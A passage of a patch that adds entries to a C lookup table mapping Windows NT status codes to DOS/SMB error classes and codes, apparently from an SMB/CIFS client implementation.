++	ERRSRV, ERRbadclient, NT_STATUS_INVALID_WORKSTATION}, {
++	ERRSRV, ERRpasswordExpired, NT_STATUS_PASSWORD_EXPIRED}, {
++	ERRSRV, ERRaccountexpired, NT_STATUS_ACCOUNT_DISABLED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NONE_MAPPED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_TOO_MANY_LUIDS_REQUESTED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_LUIDS_EXHAUSTED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_SUB_AUTHORITY}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_ACL}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_SID}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_SECURITY_DESCR}, {
++	ERRDOS, 127, NT_STATUS_PROCEDURE_NOT_FOUND}, {
++	ERRDOS, 193, NT_STATUS_INVALID_IMAGE_FORMAT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_TOKEN}, {
++	ERRHRD, ERRgeneral, NT_STATUS_BAD_INHERITANCE_ACL}, {
++	ERRDOS, 158, NT_STATUS_RANGE_NOT_LOCKED}, {
++	ERRDOS, 112, NT_STATUS_DISK_FULL}, {
++	ERRHRD, ERRgeneral, NT_STATUS_SERVER_DISABLED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_SERVER_NOT_DISABLED}, {
++	ERRDOS, 68, NT_STATUS_TOO_MANY_GUIDS_REQUESTED}, {
++	ERRDOS, 259, NT_STATUS_GUIDS_EXHAUSTED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_ID_AUTHORITY}, {
++	ERRDOS, 259, NT_STATUS_AGENTS_EXHAUSTED}, {
++	ERRDOS, 154, NT_STATUS_INVALID_VOLUME_LABEL}, {
++	ERRDOS, 14, NT_STATUS_SECTION_NOT_EXTENDED}, {
++	ERRDOS, 487, NT_STATUS_NOT_MAPPED_DATA}, {
++	ERRHRD, ERRgeneral, NT_STATUS_RESOURCE_DATA_NOT_FOUND}, {
++	ERRHRD, ERRgeneral, NT_STATUS_RESOURCE_TYPE_NOT_FOUND}, {
++	ERRHRD, ERRgeneral, NT_STATUS_RESOURCE_NAME_NOT_FOUND}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ARRAY_BOUNDS_EXCEEDED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FLOAT_DENORMAL_OPERAND}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FLOAT_DIVIDE_BY_ZERO}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FLOAT_INEXACT_RESULT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FLOAT_INVALID_OPERATION}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FLOAT_OVERFLOW}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FLOAT_STACK_CHECK}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FLOAT_UNDERFLOW}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INTEGER_DIVIDE_BY_ZERO}, {
++	ERRDOS, 534, NT_STATUS_INTEGER_OVERFLOW}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PRIVILEGED_INSTRUCTION}, {
++	ERRDOS, ERRnomem, NT_STATUS_TOO_MANY_PAGING_FILES}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FILE_INVALID}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ALLOTTED_SPACE_EXCEEDED},
++/*	{ This NT error code was 'squashed'
++	 from NT_STATUS_INSUFFICIENT_RESOURCES to
++	 NT_STATUS_INSUFF_SERVER_RESOURCES during the session setup } */
++	{
++	ERRDOS, ERRnoresource, NT_STATUS_INSUFFICIENT_RESOURCES}, {
++	ERRDOS, ERRbadpath, NT_STATUS_DFS_EXIT_PATH_FOUND}, {
++	ERRDOS, 23, NT_STATUS_DEVICE_DATA_ERROR}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DEVICE_NOT_CONNECTED}, {
++	ERRDOS, 21, NT_STATUS_DEVICE_POWER_FAILURE}, {
++	ERRDOS, 487, NT_STATUS_FREE_VM_NOT_AT_BASE}, {
++	ERRDOS, 487, NT_STATUS_MEMORY_NOT_ALLOCATED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_WORKING_SET_QUOTA}, {
++	ERRDOS, 19, NT_STATUS_MEDIA_WRITE_PROTECTED}, {
++	ERRDOS, 21, NT_STATUS_DEVICE_NOT_READY}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_GROUP_ATTRIBUTES}, {
++	ERRHRD, ERRgeneral, NT_STATUS_BAD_IMPERSONATION_LEVEL}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CANT_OPEN_ANONYMOUS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_BAD_VALIDATION_CLASS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_BAD_TOKEN_TYPE}, {
++	ERRDOS, 87, NT_STATUS_BAD_MASTER_BOOT_RECORD}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INSTRUCTION_MISALIGNMENT}, {
++	ERRDOS, ERRpipebusy, NT_STATUS_INSTANCE_NOT_AVAILABLE}, {
++	ERRDOS, ERRpipebusy, NT_STATUS_PIPE_NOT_AVAILABLE}, {
++	ERRDOS, ERRbadpipe, NT_STATUS_INVALID_PIPE_STATE}, {
++	ERRDOS, ERRpipebusy, NT_STATUS_PIPE_BUSY}, {
++	ERRDOS, ERRbadfunc, NT_STATUS_ILLEGAL_FUNCTION}, {
++	ERRDOS, ERRnotconnected, NT_STATUS_PIPE_DISCONNECTED}, {
++	ERRDOS, ERRpipeclosing, NT_STATUS_PIPE_CLOSING}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PIPE_CONNECTED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PIPE_LISTENING}, {
++	ERRDOS, ERRbadpipe, NT_STATUS_INVALID_READ_MODE}, {
++	ERRDOS, 121, NT_STATUS_IO_TIMEOUT}, {
++	ERRDOS, 38, NT_STATUS_FILE_FORCED_CLOSED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PROFILING_NOT_STARTED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PROFILING_NOT_STOPPED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_COULD_NOT_INTERPRET}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_FILE_IS_A_DIRECTORY}, {
++	ERRDOS, ERRunsup, NT_STATUS_NOT_SUPPORTED}, {
++	ERRDOS, 51, NT_STATUS_REMOTE_NOT_LISTENING}, {
++	ERRDOS, 52, NT_STATUS_DUPLICATE_NAME}, {
++	ERRDOS, 53, NT_STATUS_BAD_NETWORK_PATH}, {
++	ERRDOS, 54, NT_STATUS_NETWORK_BUSY}, {
++	ERRDOS, 55, NT_STATUS_DEVICE_DOES_NOT_EXIST}, {
++	ERRDOS, 56, NT_STATUS_TOO_MANY_COMMANDS}, {
++	ERRDOS, 57, NT_STATUS_ADAPTER_HARDWARE_ERROR}, {
++	ERRDOS, 58, NT_STATUS_INVALID_NETWORK_RESPONSE}, {
++	ERRDOS, 59, NT_STATUS_UNEXPECTED_NETWORK_ERROR}, {
++	ERRDOS, 60, NT_STATUS_BAD_REMOTE_ADAPTER}, {
++	ERRDOS, 61, NT_STATUS_PRINT_QUEUE_FULL}, {
++	ERRDOS, 62, NT_STATUS_NO_SPOOL_SPACE}, {
++	ERRDOS, 63, NT_STATUS_PRINT_CANCELLED}, {
++	ERRDOS, 64, NT_STATUS_NETWORK_NAME_DELETED}, {
++	ERRDOS, 65, NT_STATUS_NETWORK_ACCESS_DENIED}, {
++	ERRDOS, 66, NT_STATUS_BAD_DEVICE_TYPE}, {
++	ERRDOS, ERRnosuchshare, NT_STATUS_BAD_NETWORK_NAME}, {
++	ERRDOS, 68, NT_STATUS_TOO_MANY_NAMES}, {
++	ERRDOS, 69, NT_STATUS_TOO_MANY_SESSIONS}, {
++	ERRDOS, 70, NT_STATUS_SHARING_PAUSED}, {
++	ERRDOS, 71, NT_STATUS_REQUEST_NOT_ACCEPTED}, {
++	ERRDOS, 72, NT_STATUS_REDIRECTOR_PAUSED}, {
++	ERRDOS, 88, NT_STATUS_NET_WRITE_FAULT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PROFILING_AT_LIMIT}, {
++	ERRDOS, ERRdiffdevice, NT_STATUS_NOT_SAME_DEVICE}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_FILE_RENAMED}, {
++	ERRDOS, 240, NT_STATUS_VIRTUAL_CIRCUIT_CLOSED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_SECURITY_ON_OBJECT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CANT_WAIT}, {
++	ERRDOS, ERRpipeclosing, NT_STATUS_PIPE_EMPTY}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CANT_ACCESS_DOMAIN_INFO}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CANT_TERMINATE_SELF}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_SERVER_STATE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_DOMAIN_STATE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_DOMAIN_ROLE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_SUCH_DOMAIN}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DOMAIN_EXISTS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DOMAIN_LIMIT_EXCEEDED}, {
++	ERRDOS, 300, NT_STATUS_OPLOCK_NOT_GRANTED}, {
++	ERRDOS, 301, NT_STATUS_INVALID_OPLOCK_PROTOCOL}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INTERNAL_DB_CORRUPTION}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INTERNAL_ERROR}, {
++	ERRHRD, ERRgeneral, NT_STATUS_GENERIC_NOT_MAPPED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_BAD_DESCRIPTOR_FORMAT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_USER_BUFFER}, {
++	ERRHRD, ERRgeneral, NT_STATUS_UNEXPECTED_IO_ERROR}, {
++	ERRHRD, ERRgeneral, NT_STATUS_UNEXPECTED_MM_CREATE_ERR}, {
++	ERRHRD, ERRgeneral, NT_STATUS_UNEXPECTED_MM_MAP_ERROR}, {
++	ERRHRD, ERRgeneral, NT_STATUS_UNEXPECTED_MM_EXTEND_ERR}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NOT_LOGON_PROCESS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_LOGON_SESSION_EXISTS}, {
++	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_1}, {
++	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_2}, {
++	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_3}, {
++	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_4}, {
++	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_5}, {
++	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_6}, {
++	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_7}, {
++	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_8}, {
++	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_9}, {
++	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_10}, {
++	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_11}, {
++	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_12}, {
++	ERRDOS, ERRbadpath, NT_STATUS_REDIRECTOR_NOT_STARTED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_REDIRECTOR_STARTED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_STACK_OVERFLOW}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_SUCH_PACKAGE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_BAD_FUNCTION_TABLE}, {
++	ERRDOS, 203, 0xc0000100}, {
++	ERRDOS, 145, NT_STATUS_DIRECTORY_NOT_EMPTY}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FILE_CORRUPT_ERROR}, {
++	ERRDOS, 267, NT_STATUS_NOT_A_DIRECTORY}, {
++	ERRHRD, ERRgeneral, NT_STATUS_BAD_LOGON_SESSION_STATE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_LOGON_SESSION_COLLISION}, {
++	ERRDOS, 206, NT_STATUS_NAME_TOO_LONG}, {
++	ERRDOS, 2401, NT_STATUS_FILES_OPEN}, {
++	ERRDOS, 2404, NT_STATUS_CONNECTION_IN_USE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_MESSAGE_NOT_FOUND}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_PROCESS_IS_TERMINATING}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_LOGON_TYPE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_GUID_TRANSLATION}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CANNOT_IMPERSONATE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_IMAGE_ALREADY_LOADED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ABIOS_NOT_PRESENT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ABIOS_LID_NOT_EXIST}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ABIOS_LID_ALREADY_OWNED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ABIOS_NOT_LID_OWNER}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ABIOS_INVALID_COMMAND}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ABIOS_INVALID_LID}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ABIOS_SELECTOR_NOT_AVAILABLE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ABIOS_INVALID_SELECTOR}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_LDT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_LDT_SIZE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_LDT_OFFSET}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_LDT_DESCRIPTOR}, {
++	ERRDOS, 193, NT_STATUS_INVALID_IMAGE_NE_FORMAT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_RXACT_INVALID_STATE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_RXACT_COMMIT_FAILURE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_MAPPED_FILE_SIZE_ZERO}, {
++	ERRDOS, ERRnofids, NT_STATUS_TOO_MANY_OPENED_FILES}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CANCELLED}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_CANNOT_DELETE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_COMPUTER_NAME}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_FILE_DELETED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_SPECIAL_ACCOUNT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_SPECIAL_GROUP}, {
++	ERRHRD, ERRgeneral, NT_STATUS_SPECIAL_USER}, {
++	ERRHRD, ERRgeneral, NT_STATUS_MEMBERS_PRIMARY_GROUP}, {
++	ERRDOS, ERRbadfid, NT_STATUS_FILE_CLOSED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_TOO_MANY_THREADS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_THREAD_NOT_IN_PROCESS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_TOKEN_ALREADY_IN_USE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PAGEFILE_QUOTA_EXCEEDED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_COMMITMENT_LIMIT}, {
++	ERRDOS, 193, NT_STATUS_INVALID_IMAGE_LE_FORMAT}, {
++	ERRDOS, 193, NT_STATUS_INVALID_IMAGE_NOT_MZ}, {
++	ERRDOS, 193, NT_STATUS_INVALID_IMAGE_PROTECT}, {
++	ERRDOS, 193, NT_STATUS_INVALID_IMAGE_WIN_16}, {
++	ERRHRD, ERRgeneral, NT_STATUS_LOGON_SERVER_CONFLICT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_TIME_DIFFERENCE_AT_DC}, {
++	ERRHRD, ERRgeneral, NT_STATUS_SYNCHRONIZATION_REQUIRED}, {
++	ERRDOS, 126, NT_STATUS_DLL_NOT_FOUND}, {
++	ERRHRD, ERRgeneral, NT_STATUS_OPEN_FAILED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_IO_PRIVILEGE_FAILED}, {
++	ERRDOS, 182, NT_STATUS_ORDINAL_NOT_FOUND}, {
++	ERRDOS, 127, NT_STATUS_ENTRYPOINT_NOT_FOUND}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CONTROL_C_EXIT}, {
++	ERRDOS, 64, NT_STATUS_LOCAL_DISCONNECT}, {
++	ERRDOS, 64, NT_STATUS_REMOTE_DISCONNECT}, {
++	ERRDOS, 51, NT_STATUS_REMOTE_RESOURCES}, {
++	ERRDOS, 59, NT_STATUS_LINK_FAILED}, {
++	ERRDOS, 59, NT_STATUS_LINK_TIMEOUT}, {
++	ERRDOS, 59, NT_STATUS_INVALID_CONNECTION}, {
++	ERRDOS, 59, NT_STATUS_INVALID_ADDRESS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DLL_INIT_FAILED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_MISSING_SYSTEMFILE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_UNHANDLED_EXCEPTION}, {
++	ERRHRD, ERRgeneral, NT_STATUS_APP_INIT_FAILURE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PAGEFILE_CREATE_FAILED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_PAGEFILE}, {
++	ERRDOS, 124, NT_STATUS_INVALID_LEVEL}, {
++	ERRDOS, 86, NT_STATUS_WRONG_PASSWORD_CORE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ILLEGAL_FLOAT_CONTEXT}, {
++	ERRDOS, 109, NT_STATUS_PIPE_BROKEN}, {
++	ERRHRD, ERRgeneral, NT_STATUS_REGISTRY_CORRUPT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_REGISTRY_IO_FAILED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_EVENT_PAIR}, {
++	ERRHRD, ERRgeneral, NT_STATUS_UNRECOGNIZED_VOLUME}, {
++	ERRHRD, ERRgeneral, NT_STATUS_SERIAL_NO_DEVICE_INITED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_SUCH_ALIAS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_MEMBER_NOT_IN_ALIAS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_MEMBER_IN_ALIAS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ALIAS_EXISTS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_LOGON_NOT_GRANTED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_TOO_MANY_SECRETS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_SECRET_TOO_LONG}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INTERNAL_DB_ERROR}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FULLSCREEN_MODE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_TOO_MANY_CONTEXT_IDS}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_LOGON_TYPE_NOT_GRANTED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NOT_REGISTRY_FILE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NT_CROSS_ENCRYPTION_REQUIRED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DOMAIN_CTRLR_CONFIG_ERROR}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FT_MISSING_MEMBER}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ILL_FORMED_SERVICE_ENTRY}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ILLEGAL_CHARACTER}, {
++	ERRHRD, ERRgeneral, NT_STATUS_UNMAPPABLE_CHARACTER}, {
++	ERRHRD, ERRgeneral, NT_STATUS_UNDEFINED_CHARACTER}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FLOPPY_VOLUME}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FLOPPY_ID_MARK_NOT_FOUND}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FLOPPY_WRONG_CYLINDER}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FLOPPY_UNKNOWN_ERROR}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FLOPPY_BAD_REGISTERS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DISK_RECALIBRATE_FAILED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DISK_OPERATION_FAILED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DISK_RESET_FAILED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_SHARED_IRQ_BUSY}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FT_ORPHANING}, {
++	ERRHRD, ERRgeneral, 0xc000016e}, {
++	ERRHRD, ERRgeneral, 0xc000016f}, {
++	ERRHRD, ERRgeneral, 0xc0000170}, {
++	ERRHRD, ERRgeneral, 0xc0000171}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PARTITION_FAILURE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_BLOCK_LENGTH}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DEVICE_NOT_PARTITIONED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_UNABLE_TO_LOCK_MEDIA}, {
++	ERRHRD, ERRgeneral, NT_STATUS_UNABLE_TO_UNLOAD_MEDIA}, {
++	ERRHRD, ERRgeneral, NT_STATUS_EOM_OVERFLOW}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_MEDIA}, {
++	ERRHRD, ERRgeneral, 0xc0000179}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_SUCH_MEMBER}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_MEMBER}, {
++	ERRHRD, ERRgeneral, NT_STATUS_KEY_DELETED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_LOG_SPACE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_TOO_MANY_SIDS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_LM_CROSS_ENCRYPTION_REQUIRED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_KEY_HAS_CHILDREN}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CHILD_MUST_BE_VOLATILE}, {
++	ERRDOS, 87, NT_STATUS_DEVICE_CONFIGURATION_ERROR}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DRIVER_INTERNAL_ERROR}, {
++	ERRDOS, 22, NT_STATUS_INVALID_DEVICE_STATE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_IO_DEVICE_ERROR}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DEVICE_PROTOCOL_ERROR}, {
++	ERRHRD, ERRgeneral, NT_STATUS_BACKUP_CONTROLLER}, {
++	ERRHRD, ERRgeneral, NT_STATUS_LOG_FILE_FULL}, {
++	ERRDOS, 19, NT_STATUS_TOO_LATE}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_NO_TRUST_LSA_SECRET},
++/*	{ This NT error code was 'squashed'
++	 from NT_STATUS_NO_TRUST_SAM_ACCOUNT to
++	 NT_STATUS_TRUSTED_RELATIONSHIP_FAILURE during the session setup } */
++	{
++	ERRDOS, ERRnoaccess, NT_STATUS_NO_TRUST_SAM_ACCOUNT}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_TRUSTED_DOMAIN_FAILURE}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_TRUSTED_RELATIONSHIP_FAILURE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_EVENTLOG_FILE_CORRUPT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_EVENTLOG_CANT_START}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_TRUST_FAILURE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_MUTANT_LIMIT_EXCEEDED}, {
++	ERRDOS, ERRnetlogonNotStarted, NT_STATUS_NETLOGON_NOT_STARTED}, {
++	ERRSRV, ERRaccountexpired, NT_STATUS_ACCOUNT_EXPIRED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_POSSIBLE_DEADLOCK}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NETWORK_CREDENTIAL_CONFLICT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_REMOTE_SESSION_LIMIT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_EVENTLOG_FILE_CHANGED}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_NOLOGON_SERVER_TRUST_ACCOUNT},
++/*	{ This NT error code was 'squashed'
++	 from NT_STATUS_DOMAIN_TRUST_INCONSISTENT to NT_STATUS_LOGON_FAILURE
++	 during the session setup }  */
++	{
++	ERRDOS, ERRnoaccess, NT_STATUS_DOMAIN_TRUST_INCONSISTENT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FS_DRIVER_REQUIRED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_USER_SESSION_KEY}, {
++	ERRDOS, 59, NT_STATUS_USER_SESSION_DELETED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_RESOURCE_LANG_NOT_FOUND}, {
++	ERRDOS, ERRnoresource, NT_STATUS_INSUFF_SERVER_RESOURCES}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_BUFFER_SIZE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_ADDRESS_COMPONENT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_ADDRESS_WILDCARD}, {
++	ERRDOS, 68, NT_STATUS_TOO_MANY_ADDRESSES}, {
++	ERRDOS, 52, NT_STATUS_ADDRESS_ALREADY_EXISTS}, {
++	ERRDOS, 64, NT_STATUS_ADDRESS_CLOSED}, {
++	ERRDOS, 64, NT_STATUS_CONNECTION_DISCONNECTED}, {
++	ERRDOS, 64, NT_STATUS_CONNECTION_RESET}, {
++	ERRDOS, 68, NT_STATUS_TOO_MANY_NODES}, {
++	ERRDOS, 59, NT_STATUS_TRANSACTION_ABORTED}, {
++	ERRDOS, 59, NT_STATUS_TRANSACTION_TIMED_OUT}, {
++	ERRDOS, 59, NT_STATUS_TRANSACTION_NO_RELEASE}, {
++	ERRDOS, 59, NT_STATUS_TRANSACTION_NO_MATCH}, {
++	ERRDOS, 59, NT_STATUS_TRANSACTION_RESPONDED}, {
++	ERRDOS, 59, NT_STATUS_TRANSACTION_INVALID_ID}, {
++	ERRDOS, 59, NT_STATUS_TRANSACTION_INVALID_TYPE}, {
++	ERRDOS, ERRunsup, NT_STATUS_NOT_SERVER_SESSION}, {
++	ERRDOS, ERRunsup, NT_STATUS_NOT_CLIENT_SESSION}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CANNOT_LOAD_REGISTRY_FILE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DEBUG_ATTACH_FAILED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_SYSTEM_PROCESS_TERMINATED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DATA_NOT_ACCEPTED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_BROWSER_SERVERS_FOUND}, {
++	ERRHRD, ERRgeneral, NT_STATUS_VDM_HARD_ERROR}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DRIVER_CANCEL_TIMEOUT}, {
++	ERRHRD, ERRgeneral, NT_STATUS_REPLY_MESSAGE_MISMATCH}, {
++	ERRHRD, ERRgeneral, NT_STATUS_MAPPED_ALIGNMENT}, {
++	ERRDOS, 193, NT_STATUS_IMAGE_CHECKSUM_MISMATCH}, {
++	ERRHRD, ERRgeneral, NT_STATUS_LOST_WRITEBEHIND_DATA}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CLIENT_SERVER_PARAMETERS_INVALID}, {
++	ERRSRV, ERRpasswordExpired, NT_STATUS_PASSWORD_MUST_CHANGE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NOT_FOUND}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NOT_TINY_STREAM}, {
++	ERRHRD, ERRgeneral, NT_STATUS_RECOVERY_FAILURE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_STACK_OVERFLOW_READ}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FAIL_CHECK}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DUPLICATE_OBJECTID}, {
++	ERRHRD, ERRgeneral, NT_STATUS_OBJECTID_EXISTS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CONVERT_TO_LARGE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_RETRY}, {
++	ERRHRD, ERRgeneral, NT_STATUS_FOUND_OUT_OF_SCOPE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ALLOCATE_BUCKET}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PROPSET_NOT_FOUND}, {
++	ERRHRD, ERRgeneral, NT_STATUS_MARSHALL_OVERFLOW}, {
